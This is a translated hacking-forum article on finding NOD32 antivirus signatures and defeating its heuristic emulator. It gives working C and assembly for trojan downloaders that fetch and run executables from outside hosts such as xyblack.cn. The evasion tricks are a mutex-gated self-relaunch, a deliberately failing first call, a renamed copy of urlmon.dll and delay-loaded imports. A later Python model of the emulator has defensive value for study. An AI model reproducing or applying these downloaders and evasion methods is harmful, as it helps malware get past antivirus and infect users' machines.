Experience in locating and evading NOD32
---- Collected from the idying site: http://www.idying.cn
Discussion welcome
First, the method for locating the signature:
1. NOD32 cannot be located with forward (block-by-block) filling; even when forward filling finds a spot, that spot cannot be modified without keeping the detection. For NOD32 choose reverse location, with a start position of 400.
The fill byte does not have to be 0x90 (NOP); filling with 0x90 sometimes disturbs the result, so try another fill value when it does.
2. Then apply the evasion techniques below.
Collected methods for evading NOD32
Source code:
1
Delay-loaded imports: no change to the code itself
Example (MSVC; the advapi32 imports move from the normal import table into the delay-load import directory and are resolved only on first call):
#pragma comment(lib, "delayimp.lib")                // required: the delay-load helper
#pragma comment(linker, "/delayload:advapi32.dll")  // resolve advapi32.dll on first use
#pragma comment(linker, "/delay:unload")            // allow the delay-loaded DLL to be unloaded
#pragma comment(lib, "advapi32.lib")                // add this line too
2
Relaunching through a named mutex to defeat the NOD32 heuristics
/*--------------------------------------
 / Author: gtr4 [o.s.t]
 / Email: 502440115@qq.com
 / Time: 2009/8/29
 / From: www.3est.com
 / Copyright (c) 2009 gtr4.
 /
 / Just for fun!
 / Do it, do our best!
 --------------------------------------*/
#include <windows.h>
#include <urlmon.h>
#pragma comment(lib, "urlmon.lib")
#pragma comment(lib, "shell32.lib")

int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
    char   strAppName[] = "gtr4";
    char   strPath[MAX_PATH];
    HANDLE hMutex = NULL;

    // Create a named mutex; the second instance finds that it already exists
    hMutex = CreateMutex(NULL, FALSE, strAppName);
    if (hMutex != NULL)
    {
        if (GetLastError() == ERROR_ALREADY_EXISTS)
        {
            MessageBox(NULL, "two", "", 0);
            // Second instance: the payload (the download URL is elided in the original)
            URLDownloadToFile(NULL, "http://.EXE", "C:\\test.exe", 0, NULL);
            ShellExecute(0, "open", "C:\\test.exe", NULL, NULL, SW_SHOW);
        }
        else
        {
            MessageBox(NULL, "one", "", 0);
            // First instance: relaunch itself hidden, wait, then exit
            GetModuleFileName(GetModuleHandle(NULL), strPath, sizeof(strPath));
            WinExec(strPath, SW_HIDE);
            Sleep(1000);
            ExitProcess(-1);
        }
    }
    return 0;
}
3. Some material found on Baidu
Next we analyse the NOD32 heuristic mechanism thoroughly:
I still use a simple downloader as the test case. That does not matter, because NOD32 applies the same mechanism to everything; any of these methods works for trojans or viruses alike.
Heuristic scanning belongs to the file-scanning engine, so that is what we should call it. NOD32 is therefore not only heuristic: it also applies traditional pattern matching (a virus sample is captured and reverse-engineered by hand; credit to the NOD32 sample analysts, who pick out something particular about the sample and store those bytes in the virus database as a signature under a name. NOD32's naming rule is generally "platform/definition name", for example Win32/TrojanDownloader). Besides the heuristics, the console also exposes the file-monitoring (real-time protection) options.
There is an option for advanced heuristic scanning. Only when it is selected does the scanning engine invoke the advanced heuristic analysis while scanning files, so make sure that option is checked; otherwise, if the NOD32 virus database has no matching pattern, the sample walks straight through.
One reason NOD32 is comparatively smart and efficient is that it groups certain functions into specific combinations. Downloading and then executing right away is typical downloader behaviour, so NOD32 generally uses the download-and-execute pair as the basis for a downloader verdict. (More judgement may be involved, for example whether the program does anything else; if it only downloads and executes, it must be a downloader.)
Let's test this with a program that only downloads. NOD32 does not flag it. The code is as follows:
Code:
format PE GUI 4.0 \
  on '%include%\stub.txt'
entry _start
include 'win32ax.inc'

section '.text' code readable executable
_start:
        xor     esi, esi                ; esi = NULL, reused for the unused arguments
        invoke  URLDownloadToCacheFile, esi, szUrl, szPath, PATHSIZE, esi, esi
        ret

section '.data' data readable writeable
szUrl    db 'http://www.xyblack.cn/s.exe', 0
szPath   rb 260                         ; receives the path of the cached copy
PATHSIZE = $ - szPath                   ; size of that buffer, in characters

section '.idata' import data readable writeable
library urlmon, 'urlmon.dll'
import  urlmon, URLDownloadToCacheFile, 'URLDownloadToCacheFileA'
After the above code is compiled, NOD32 reports nothing.
However, if any execute call (such as `invoke WinExec, szPath, SW_HIDE`) is added after the `invoke URLDownloadToCacheFile, esi, szUrl, szPath, PATHSIZE, esi, esi` line, NOD32 reports a virus. The strong point of NOD32 is that it analyses the program's import table. Most download and execute functions live in urlmon.dll, kernel32.dll and wininet.dll, so our program only needs to import urlmon.dll or kernel32.dll; and as soon as the program uses URLDownloadToCacheFile and also imports kernel32.dll, NOD32 reports a virus. That undoubtedly saves a great deal of work, but it also produces false positives: for a program built with a compiler that emits a proper PE, if kernel32.dll is imported but the only function actually used is a download, the program is reported anyway, which is clearly a false positive.
Still, an antivirus as good as NOD32 does not simply decide you are a virus because you import these dangerous functions, since many normal programs call them. Using virtual-machine code emulation, it concentrates on the functions you import and analyses their behaviour and parameters.
So is NOD32 really that hard to get past? Below we break its heuristic mechanism from several angles.
Breakthrough method 1:
Because NOD32 is based on a virtual machine (code emulation), the first method targets that virtual machine; in essence it is a matter of its judgement logic. NOD32 emulates the code, so I give it a piece of normal-looking code to look at. (Note: the general idea was found by a friend, but the whole design below is my own.)
Example:
        invoke  GetModuleFileName, esi, ebx, MAX_PATH
        invoke  WinExec, ebx, SW_HIDE
        invoke  ExitProcess, 0
This is normal: the program obtains its own file path, runs it and exits. I believe that when the NOD32 engine emulates this it concludes the program is benign, especially because at the ExitProcess call the program has ended.
Look closer: the code above obtains its own path and then runs itself. So all we need is a way to tell, on the second run, that we have already been run once, and then jump to a specific address, which holds our trojan code. Because NOD32 analyses our trojan as if it were running for the first time, the check never takes the trojan branch under emulation; the emulator only executes the benign code, so NOD32 is forced to regard this as a normal program, and the heuristics are escaped.
The implementation code is as follows:
Code:
format PE GUI 4.0 \
  on '%include%\stub.txt'
entry _start
include 'win32ax.inc'

section '.text' code readable executable
_start:
        xor     esi, esi
        ; create a named kernel object; for the second instance it already exists
        invoke  CreateEvent, esi, esi, esi, szMutex
        invoke  GetLastError
        cmp     eax, 183                ; ERROR_ALREADY_EXISTS
        je      @f
        ; first run (and what the emulator sees): relaunch self hidden, then exit
        mov     ebx, szName
        invoke  GetModuleFileName, esi, ebx, MAX_PATH
        invoke  WinExec, ebx, SW_HIDE
        invoke  Sleep, 1000
        jmp     _end
@@:
        ; second run: download and execute
        invoke  URLDownloadToFile, esi, szUrl, szPath, esi, esi
        invoke  WinExec, szPath, SW_SHOW
_end:
        invoke  ExitProcess, 0

section '.data' data readable writeable
szMutex db 'woaihahaha', 0
szUrl   db 'http://www.xyblack.cn/s.exe', 0
szPath  db 'f:\2.exe', 0
szName  rb MAX_PATH

section '.idata' import data readable writeable
library urlmon, 'urlmon.dll', \
        kernel32, 'kernel32.dll'
import  urlmon, URLDownloadToFile, 'URLDownloadToFileA'
include 'api\kernel32.inc'
Explanation: all that was added is a call that creates a named kernel object. The first run creates it successfully, and that is the basis of the check: if the creation reports that the object already exists, run the download instead, and that only happens when the named kernel object exists already. When NOD32 emulates this instruction the creation succeeds, so it goes on to execute the code that gets the program's own path, runs itself and exits, and a program that is analysed through to its exit is considered safe. On the second run of our program the object already exists, so the download-and-execute functions are executed instead.
In this way we break through the NOD32 heuristic mechanism easily.
Breakthrough method 2:
This method targets the judgement logic of NOD32's virtual-machine code emulation. Since NOD32 is based on a virtual machine, I deliberately designed one call so that it errors. When the emulator hits that error while analysing the call, I believe it does not analyse the function again but moves on to the following instruction; there it analyses the execute call, concludes that the program merely runs a file, and treats it as safe. Ha, this too is a simple way through the NOD32 heuristics.
Code:
format PE GUI 4.0 \
  on '%include%\stub.txt'
entry _start
include 'win32ax.inc'

section '.text' code readable executable
_start:
        xor     esi, esi
        xor     edi, edi                ; first attempt: URL = NULL ...
        xor     ebx, ebx                ; ... and file name = NULL, so the call fails
        jmp     @f
_l1:
        mov     edi, szUrl              ; retry with the real arguments
        mov     ebx, szPath
@@:
        invoke  URLDownloadToFile, esi, edi, ebx, esi, esi
        or      eax, eax                ; S_OK = 0; anything else is an error
        jne     _l1                     ; note: loops forever if the real download also fails
        invoke  WinExec, szPath, SW_HIDE
        invoke  ExitProcess, 0

section '.data' data readable writeable
szUrl   db 'http://www.xyblack.cn/s.exe', 0
szPath  db 'c:\1.exe', 0

section '.idata' import data readable writeable
library urlmon, 'urlmon.dll', \
        kernel32, 'kernel32.dll'
import  urlmon, URLDownloadToFile, 'URLDownloadToFileA'
include 'api\kernel32.inc'
Breakthrough method 3:
This method is based on dynamic address resolution, because during my analysis NOD32 proved very insensitive to DLLs loaded from non-system locations. Since LoadLibrary and GetProcAddress go together, I assume NOD32 puts this function pair into a specific matching package; but when it analyses the LoadLibrary parameter and that parameter points to a non-system DLL, NOD32 does not examine it closely, since it may well be the user's own DLL whose export names merely happen to match. Some will say: I will write my own DLL, implement the download in it and export it. But the DLL you write still imports the exports of the system DLL, so NOD32 still catches it. Here instead a harmless operating-system DLL is used, and it becomes "toxic" simply by being renamed. Ha.
Code:
format PE GUI 4.0 \
  on '%include%\stub.txt'
entry _start
include 'win32ax.inc'

section '.text' code readable writeable executable
szText       db 'URLDownloadToFileA', 0
szUrl        db 'http://www.xyblack.cn/bitmap.exe', 0
szPath       db 'c:\1.exe', 0
szDll        db '\urlmon.dll', 0        ; 12 bytes, appended to the system directory
szNewPath    db 'c:\3.dll', 0
szWindowPath rb MAX_PATH

_start:
        invoke  GetSystemDirectory, szWindowPath, MAX_PATH
        ; find the terminating NUL of the system directory path
        mov     edi, szWindowPath
        mov     ecx, MAX_PATH
        xor     eax, eax
        repne   scasb
        dec     edi                     ; edi -> the NUL; overwrite it with '\urlmon.dll',0
        mov     ecx, 12
        mov     esi, szDll
        rep     movsb
        ; copy the system urlmon.dll under a harmless-looking name and load the copy
        invoke  CopyFile, szWindowPath, szNewPath, 0     ; bFailIfExists = FALSE
        invoke  LoadLibrary, szNewPath
        invoke  GetProcAddress, eax, szText
        xor     esi, esi
        stdcall eax, esi, szUrl, szPath, esi, esi        ; URLDownloadToFileA via the resolved pointer
        invoke  WinExec, szPath, SW_HIDE
        ret

section '.idata' import data readable writeable
library kernel32, 'kernel32.dll'
include 'api\kernel32.inc'
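The three methods above, and the download-then-execute rule described before them, all turn on what the emulator does at one decision point. The following is an added illustration of that reasoning; it is not code from the article's author and not ESET's engine. It assumes a toy scanner whose only rule is "download API followed by execute API", a constructed fake Win32 environment, stand-in URL and file paths, and the usual values of ERROR_ALREADY_EXISTS and E_INVALIDARG. Each sample is the corresponding assembly program re-expressed as the sequence of API calls it makes, so it is the emulator's trace, not a real download, that gets scanned:

```python
"""Toy model of an emulating heuristic scanner (constructed for this article;
not ESET's engine). The Win32 API names are real; the samples, return values
and scanner rules are assumptions that show why methods 1-3 pass a naive
single-path emulator and fail a thorough one."""
ERROR_ALREADY_EXISTS = 183         # GetLastError after CreateEvent in a second instance
E_INVALIDARG = 0x80070057          # HRESULT for a NULL URL / file name
DOWNLOAD_APIS = {"URLDownloadToFileA", "URLDownloadToCacheFileA"}
EXEC_APIS = {"WinExec", "ShellExecuteA", "CreateProcessA"}
SYSTEM_DIR = "C:\\WINDOWS\\system32"                       # assumed
URL, PATH = "http://example.invalid/s.exe", "C:\\1.exe"   # assumed stand-ins


class Env:
    """Fake Win32 environment; `thorough` switches on the stronger emulator rules."""

    def __init__(self, thorough, already_exists=False):
        self.thorough = thorough
        self.already_exists = already_exists   # emulate the 1st (False) or 2nd (True) instance
        self.trace = []                         # API names the emulator recognised, in order
        self.modules = {}                       # fake HMODULE -> path given to LoadLibraryA

    def call(self, api, *args):
        if isinstance(api, tuple):              # indirect call through a GetProcAddress result
            module, name = api
            if not self.thorough and not module.lower().startswith(SYSTEM_DIR.lower()):
                self.trace.append("<unknown>")  # naive rule: code in a user DLL is opaque
                return 0
            api = name                          # thorough rule: the export name is the API
        self.trace.append(api)
        if api == "GetLastError":
            return ERROR_ALREADY_EXISTS if self.already_exists else 0
        if api in DOWNLOAD_APIS and 0 in (args[1], args[2]):
            if not self.thorough:
                self.trace.pop()                # naive rule: a failed call is dropped, not retried
                return 0
            return E_INVALIDARG                 # thorough rule: report failure, keep emulating
        if api == "GetSystemDirectoryA":
            return SYSTEM_DIR
        if api == "LoadLibraryA":
            handle = 0x10000000 + 0x10000 * len(self.modules)
            self.modules[handle] = args[0]
            return handle
        if api == "GetProcAddress":
            return (self.modules[args[0]], args[1])
        return 0                                # S_OK / success for everything else


def has_download_then_exec(trace):
    """The article's downloader rule: a download API followed by an execute API."""
    seen_download = False
    for name in trace:
        seen_download = seen_download or name in DOWNLOAD_APIS
        if seen_download and name in EXEC_APIS:
            return True
    return False


def scan(sample, thorough):
    """Naive: one pass as the first instance. Thorough: both instance states."""
    for already_exists in ((False, True) if thorough else (False,)):
        env = Env(thorough, already_exists)
        sample(env)
        if has_download_then_exec(env.trace):
            return "Win32/TrojanDownloader"
    return "clean"


# Samples: the article's programs re-expressed as the API calls they make.
def download_only(env):                        # the first test program above
    env.call("URLDownloadToCacheFileA", 0, URL, PATH, 260, 0, 0)

def download_and_run(env):                     # the same with WinExec appended
    env.call("URLDownloadToCacheFileA", 0, URL, PATH, 260, 0, 0)
    env.call("WinExec", PATH, 0)

def method1_event_gate(env):
    env.call("CreateEventA", 0, 0, 0, "woaihahaha")
    if env.call("GetLastError") == ERROR_ALREADY_EXISTS:     # second instance
        env.call("URLDownloadToFileA", 0, URL, PATH, 0, 0)
        env.call("WinExec", PATH, 5)
    else:                                                     # first instance relaunches itself
        env.call("GetModuleFileNameA", 0, "self", 260)
        env.call("WinExec", "self", 0)
        env.call("Sleep", 1000)
    env.call("ExitProcess", 0)

def method2_fail_first(env):
    url = path = 0                                            # deliberately bogus first call
    while env.call("URLDownloadToFileA", 0, url, path, 0, 0) != 0:
        url, path = URL, PATH                                 # retry with the real arguments
    env.call("WinExec", PATH, 0)
    env.call("ExitProcess", 0)

def method3_renamed_dll(env):
    sysdir = env.call("GetSystemDirectoryA", "buf", 260)
    env.call("CopyFileA", sysdir + "\\urlmon.dll", "C:\\3.dll", 0)
    h = env.call("LoadLibraryA", "C:\\3.dll")
    fn = env.call("GetProcAddress", h, "URLDownloadToFileA")
    env.call(fn, 0, URL, PATH, 0, 0)                          # stdcall through the pointer
    env.call("WinExec", PATH, 0)


if __name__ == "__main__":
    for sample in (download_only, download_and_run, method1_event_gate,
                   method2_fail_first, method3_renamed_dll):
        print(f"{sample.__name__:20} naive={scan(sample, False):22} "
              f"thorough={scan(sample, True)}")
```

Run it and the naive column reports all three tricks as clean while the thorough column flags them; the plain download-only program stays clean under both, and the plain download-and-run program is flagged under both. The three rules that close the gaps (try both outcomes of the already-exists check, keep emulating after a failed call, identify an API by the export name passed to GetProcAddress rather than by the module path it came from) are exactly the assumptions each method needs the emulator not to make. Whether a given NOD32 build makes them is something only testing against that build can tell you; the model only shows where the decision lives.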
I hope this article draws the attention of NOD32 and helps you understand its heuristic mechanism in depth. It is intended for technical research only; I take no responsibility for any illegal activity that uses the techniques described here. I don't think there is any other article on the Internet that analyses this with worked examples like these. Finally, I wish my motherland's Olympic Games every success!!!!!